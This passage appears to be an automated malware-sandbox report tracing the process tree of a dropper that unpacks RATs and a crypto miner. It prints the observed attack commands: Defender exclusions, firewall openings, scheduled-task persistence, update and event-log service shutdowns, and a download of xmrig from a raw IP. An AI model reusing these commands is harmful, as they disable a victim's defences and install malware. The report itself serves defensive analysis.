2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2824	hbfgjhhesfd.exe
1652	svchost.exe
2952	diskutil.exe
1896	lkyhjksefa.exe
2864	33.exe
2864	33.exe
960	iexplore.exe
960	iexplore.exe
2776	boost.exe
2776	boost.exe
2864	33.exe
2864	33.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2492 wrote to memory of 1376	2492	New Text Document mod.exe	39
PID 2492 wrote to memory of 1376	2492	New Text Document mod.exe	39
PID 2492 wrote to memory of 1376	2492	New Text Document mod.exe	39
PID 2492 wrote to memory of 1376	2492	New Text Document mod.exe	39
PID 2484 wrote to memory of 2824	2484	4363463463464363463463463.exe	40
PID 2484 wrote to memory of 2824	2484	4363463463464363463463463.exe	40
PID 2484 wrote to memory of 2824	2484	4363463463464363463463463.exe	40
PID 2484 wrote to memory of 2824	2484	4363463463464363463463463.exe	40
PID 2484 wrote to memory of 2892	2484	4363463463464363463463463.exe	42
PID 2484 wrote to memory of 2892	2484	4363463463464363463463463.exe	42
PID 2484 wrote to memory of 2892	2484	4363463463464363463463463.exe	42
PID 2484 wrote to memory of 2892	2484	4363463463464363463463463.exe	42
PID 2824 wrote to memory of 2644	2824	hbfgjhhesfd.exe	43
PID 2824 wrote to memory of 2644	2824	hbfgjhhesfd.exe	43
PID 2824 wrote to memory of 2644	2824	hbfgjhhesfd.exe	43
PID 2824 wrote to memory of 2644	2824	hbfgjhhesfd.exe	43
PID 2484 wrote to memory of 2652	2484	4363463463464363463463463.exe	45
PID 2484 wrote to memory of 2652	2484	4363463463464363463463463.exe	45
PID 2484 wrote to memory of 2652	2484	4363463463464363463463463.exe	45
PID 2484 wrote to memory of 2652	2484	4363463463464363463463463.exe	45
PID 2484 wrote to memory of 1732	2484	4363463463464363463463463.exe	46
PID 2484 wrote to memory of 1732	2484	4363463463464363463463463.exe	46
PID 2484 wrote to memory of 1732	2484	4363463463464363463463463.exe	46
PID 2484 wrote to memory of 1732	2484	4363463463464363463463463.exe	46
PID 1732 wrote to memory of 2208	1732	lastest.exe	47
PID 1732 wrote to memory of 2208	1732	lastest.exe	47
PID 1732 wrote to memory of 2208	1732	lastest.exe	47
PID 1732 wrote to memory of 2208	1732	lastest.exe	47
PID 2208 wrote to memory of 2036	2208	svchost.exe	48
PID 2208 wrote to memory of 2036	2208	svchost.exe	48
PID 2208 wrote to memory of 2036	2208	svchost.exe	48
PID 2208 wrote to memory of 2036	2208	svchost.exe	48
PID 2208 wrote to memory of 1180	2208	svchost.exe	50
PID 2208 wrote to memory of 1180	2208	svchost.exe	50
PID 2208 wrote to memory of 1180	2208	svchost.exe	50
PID 2208 wrote to memory of 1180	2208	svchost.exe	50
PID 2484 wrote to memory of 1876	2484	4363463463464363463463463.exe	52
PID 2484 wrote to memory of 1876	2484	4363463463464363463463463.exe	52
PID 2484 wrote to memory of 1876	2484	4363463463464363463463463.exe	52
PID 2484 wrote to memory of 1876	2484	4363463463464363463463463.exe	52
PID 1876 wrote to memory of 568	1876	XClient.exe	53
PID 1876 wrote to memory of 568	1876	XClient.exe	53
PID 1876 wrote to memory of 568	1876	XClient.exe	53
PID 1876 wrote to memory of 2180	1876	XClient.exe	55
PID 1876 wrote to memory of 2180	1876	XClient.exe	55
PID 1876 wrote to memory of 2180	1876	XClient.exe	55
PID 1876 wrote to memory of 2508	1876	XClient.exe	57
PID 1876 wrote to memory of 2508	1876	XClient.exe	57
PID 1876 wrote to memory of 2508	1876	XClient.exe	57
PID 1876 wrote to memory of 1640	1876	XClient.exe	59
PID 1876 wrote to memory of 1640	1876	XClient.exe	59
PID 1876 wrote to memory of 1640	1876	XClient.exe	59
PID 1876 wrote to memory of 2808	1876	XClient.exe	61
PID 1876 wrote to memory of 2808	1876	XClient.exe	61
PID 1876 wrote to memory of 2808	1876	XClient.exe	61
PID 2492 wrote to memory of 2660	2492	New Text Document mod.exe	63
PID 2492 wrote to memory of 2660	2492	New Text Document mod.exe	63
PID 2492 wrote to memory of 2660	2492	New Text Document mod.exe	63
PID 2492 wrote to memory of 2660	2492	New Text Document mod.exe	63
PID 2484 wrote to memory of 2632	2484	4363463463464363463463463.exe	64
PID 2484 wrote to memory of 2632	2484	4363463463464363463463463.exe	64
PID 2484 wrote to memory of 2632	2484	4363463463464363463463463.exe	64
PID 2484 wrote to memory of 2632	2484	4363463463464363463463463.exe	64
PID 2492 wrote to memory of 2844	2492	New Text Document mod.exe	65

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241212-wymq6ssnat_pw_infected.zip"
1⤵
- Quasar RAT
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1600

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document.txt
1⤵
- Suspicious use of FindShellTrayWindow
PID:2724

C:\Users\Admin\AppData\Local\Temp\Temp1_4363463463464363463463463.zip\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_4363463463464363463463463.zip\4363463463464363463463463.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484
- C:\Windows\SysWOW64\Files\hbfgjhhesfd.exe
  "C:\Windows\System32\Files\hbfgjhhesfd.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Framework" /sc ONLOGON /tr "C:\Windows\SysWOW64\Files\hbfgjhhesfd.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2644
- C:\Windows\SysWOW64\Files\sunset1.exe
  "C:\Windows\System32\Files\sunset1.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2892
- C:\Windows\SysWOW64\Files\msgde.exe
  "C:\Windows\System32\Files\msgde.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2652
- C:\Windows\SysWOW64\Files\lastest.exe
  "C:\Windows\System32\Files\lastest.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2208
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2036
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM ApplicationFrameHost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1180
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 616
      4⤵
      PID:1596
- C:\Windows\SysWOW64\Files\XClient.exe
  "C:\Windows\System32\Files\XClient.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\Files\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    PID:568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    PID:2180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Desktop Window Manager.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    PID:2508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Desktop Window Manager.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    PID:1640
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Desktop Window Manager" /tr "C:\ProgramData\Desktop Window Manager.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2808
- C:\Windows\SysWOW64\Files\shell.exe
  "C:\Windows\System32\Files\shell.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2632
- C:\Windows\SysWOW64\Files\svchost.exe
  "C:\Windows\System32\Files\svchost.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:1652
- C:\Windows\SysWOW64\Files\smell-the-roses.exe
  "C:\Windows\System32\Files\smell-the-roses.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2948
- C:\Windows\SysWOW64\Files\Loader.exe
  "C:\Windows\System32\Files\Loader.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2352
- C:\Windows\SysWOW64\Files\TPB-1.exe
  "C:\Windows\System32\Files\TPB-1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  PID:1964
- C:\Windows\SysWOW64\Files\lkyhjksefa.exe
  "C:\Windows\System32\Files\lkyhjksefa.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1896
- C:\Windows\SysWOW64\Files\TikTokDesktop18.exe
  "C:\Windows\System32\Files\TikTokDesktop18.exe"
  2⤵
  - Executes dropped EXE
  PID:2212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\jee4BHEO'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID:2760
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\jee4BHEO
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:920
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID:2496
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:2980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID:1596
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:2892
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 996
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1936
- C:\Windows\SysWOW64\Files\OfferedBuilt.exe
  "C:\Windows\System32\Files\OfferedBuilt.exe"
  2⤵
  - Executes dropped EXE
  PID:2064
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Dominant Dominant.cmd & Dominant.cmd
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3036
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2680
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2624
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:2968
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1692
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 73548
      4⤵
      System Location Discovery: System Language Discovery
      PID:1960
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "EvilTeethMagnificentSub" Shoulder
      4⤵
      System Location Discovery: System Language Discovery
      PID:608
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Appreciated + Consequences + Atmospheric + Under + Medium + Edt + Launched + Expert + Ready + Korean + Cite + Suspended + Set + Maple 73548\h
      4⤵
      System Location Discovery: System Language Discovery
      PID:784
  - - C:\Users\Admin\AppData\Local\Temp\73548\Mph.pif
      73548\Mph.pif 73548\h
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2956
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "GaiaTrack" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EcoOptimize Solutions\GaiaTrack.js'" /sc onlogon /F /RL HIGHEST
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2280
    - - C:\Users\Admin\AppData\Local\Temp\73548\Mph.pif
        
        C:\Users\Admin\AppData\Local\Temp\73548\Mph.pif
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:1560
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2204
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2256
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 15
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:840
- C:\Windows\SysWOW64\Files\121.exe
  "C:\Windows\System32\Files\121.exe"
  2⤵
  - Executes dropped EXE
  PID:2164
- C:\Windows\SysWOW64\Files\njrat.exe
  "C:\Windows\System32\Files\njrat.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:1360
- - C:\Windows\rundll32.exe
    "C:\Windows\rundll32.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops autorun.inf file
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    PID:1900
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2076
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 696
      4⤵
      System Location Discovery: System Language Discovery
      PID:2524
- C:\Windows\SysWOW64\Files\chrome_93.exe
  "C:\Windows\System32\Files\chrome_93.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2936
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    PID:1860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1820
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2276
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1532
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2228
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2892
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1768
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2364
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2452
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:1884
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:2320
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:1896
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:2684
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2252
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2536
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:1688
- C:\Windows\SysWOW64\Files\Microsoft_Hardware_Launch.exe
  "C:\Windows\System32\Files\Microsoft_Hardware_Launch.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:928
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Windows\SysWOW64\Files\Microsoft_Hardware_Launch.exe" "Microsoft_Hardware_Launch.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1720
- C:\Windows\SysWOW64\Files\Runtime%20Broker.exe
  "C:\Windows\System32\Files\Runtime%20Broker.exe"
  2⤵
  - Executes dropped EXE
  PID:1808
- C:\Windows\SysWOW64\Files\8fc809.exe
  "C:\Windows\System32\Files\8fc809.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2300
- C:\Windows\SysWOW64\Files\exit.exe
  "C:\Windows\System32\Files\exit.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DDF1.tmp\DDF2.tmp\DDF3.bat C:\Windows\SysWOW64\Files\exit.exe"
    3⤵
    PID:2456
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://bit.ly/4fRa6OO
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:960
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:960 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1524
- C:\Windows\SysWOW64\Files\crypted.exe
  "C:\Windows\System32\Files\crypted.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:2264
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1940
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1904
- C:\Windows\SysWOW64\Files\joiner.exe
  "C:\Windows\System32\Files\joiner.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1592
- - C:\Users\Admin\AppData\Local\Temp\server.exe
    "C:\Users\Admin\AppData\Local\Temp\server.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Drops autorun.inf file
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    PID:3004
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2456
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:3036
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2184
  - - C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:1256
    - - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3004
- C:\Windows\SysWOW64\Files\MMO%201.exe
  "C:\Windows\System32\Files\MMO%201.exe"
  2⤵
  PID:2876

C:\Users\Admin\AppData\Local\Temp\Temp1_New Text Document mod.exse.zip\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_New Text Document mod.exse.zip\New Text Document mod.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2492
- C:\Windows\System32\a\win.exe
  "C:\Windows\System32\a\win.exe"
  2⤵
  - Executes dropped EXE
  PID:1376
- C:\Windows\System32\a\Office%202010%20Toolkit.exe
  "C:\Windows\System32\a\Office%202010%20Toolkit.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2660
- C:\Windows\System32\a\Coc%20Coc.exe
  "C:\Windows\System32\a\Coc%20Coc.exe"
  2⤵
  - Executes dropped EXE
  PID:2844
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D96E.tmp\D96F.tmp\D970.bat C:\Windows\System32\a\Coc%20Coc.exe"
    3⤵
    - Drops file in Program Files directory
    PID:2872
  - - C:\Users\Admin\AppData\Roaming\portable_util.exe
      portable_util.exe --register-coccoc-portable --force-uid=3849d47c-687c-49be-b315-4e062899d124 --skip-import --skip-welcome --do-not-create-shortcut --force-regenerate-hid
      4⤵
      Executes dropped EXE
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2928
- C:\Windows\System32\a\winvnc.exe
  "C:\Windows\System32\a\winvnc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1752
- C:\Windows\System32\a\vc_redist.x64.exe
  "C:\Windows\System32\a\vc_redist.x64.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3012
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3012 -s 184
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:2116
- C:\Windows\System32\a\Google%20Chrome.exe
  "C:\Windows\System32\a\Google%20Chrome.exe"
  2⤵
  - Executes dropped EXE
  PID:560
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\80C.tmp\80D.tmp\80E.bat C:\Windows\System32\a\Google%20Chrome.exe"
    3⤵
    PID:1072
- C:\Windows\System32\a\xmrig.exe
  "C:\Windows\System32\a\xmrig.exe"
  2⤵
  - Executes dropped EXE
  PID:1584
- C:\Windows\System32\a\Bootxr.exe
  "C:\Windows\System32\a\Bootxr.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:568
- C:\Windows\System32\a\.exe
  "C:\Windows\System32\a\.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1600
- C:\Windows\System32\a\diskutil.exe
  "C:\Windows\System32\a\diskutil.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2020
- - C:\Windows\system32\schtasks.exe
    "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1220
- - C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe
    "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2952
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2448
- C:\Windows\System32\a\systempreter.exe
  "C:\Windows\System32\a\systempreter.exe"
